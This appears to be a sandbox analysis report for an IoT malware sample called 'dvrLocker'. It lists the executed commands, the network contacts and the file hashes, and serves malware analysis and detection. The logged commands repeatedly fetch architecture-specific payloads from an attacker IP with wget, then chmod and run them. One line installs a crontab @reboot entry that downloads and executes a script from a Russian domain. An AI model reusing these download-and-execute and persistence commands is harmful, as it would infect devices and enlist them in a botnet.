[ls -l /proc/70/exe]

/bin/ls

[ls -l /proc/702/exe]

/bin/ls

[ls -l /proc/703/exe]

/bin/ls

[ls -l /proc/705/exe]

/bin/ls

[ls -l /proc/707/exe]

/bin/ls

[ls -l /proc/708/exe]

/bin/ls

[ls -l /proc/709/exe]

/bin/ls

[ls -l /proc/71/exe]

/bin/ls

[ls -l /proc/710/exe]

/bin/ls

[ls -l /proc/711/exe]

/bin/ls

[ls -l /proc/712/exe]

/bin/ls

[ls -l /proc/72/exe]

/bin/ls

[ls -l /proc/73/exe]

/bin/ls

[ls -l /proc/74/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/77/exe]

/bin/ls

[ls -l /proc/79/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/80/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf mpsl]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

Network

Country Destination Domain Proto
LT 45.125.66.90:80 45.125.66.90 tcp
DE 217.160.70.42:53 kingstonwikkerink.dyn udp
US 128.254.146.232:17289 kingstonwikkerink.dyn tcp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/var/spool/cron/crontabs/tmp.Uw0tZs

MD5 2fbaf9a94577da61ead6786557355f03
SHA1 09a7a8bb07b2e052e230744a7a2dfff6a649776b
SHA256 f6a6bc7ee3507b8c07807574731ad14c35195252608a2223e5885e772f9bf4c1
SHA512 a45c2cb4da881374a691023c8f27caa273f27ab1a533d67191a5f4cee4ef19d41f4c01084e9dfbcd5c086e9d7f2fc237f7d8d33242a84d387459bd13dcd16ba3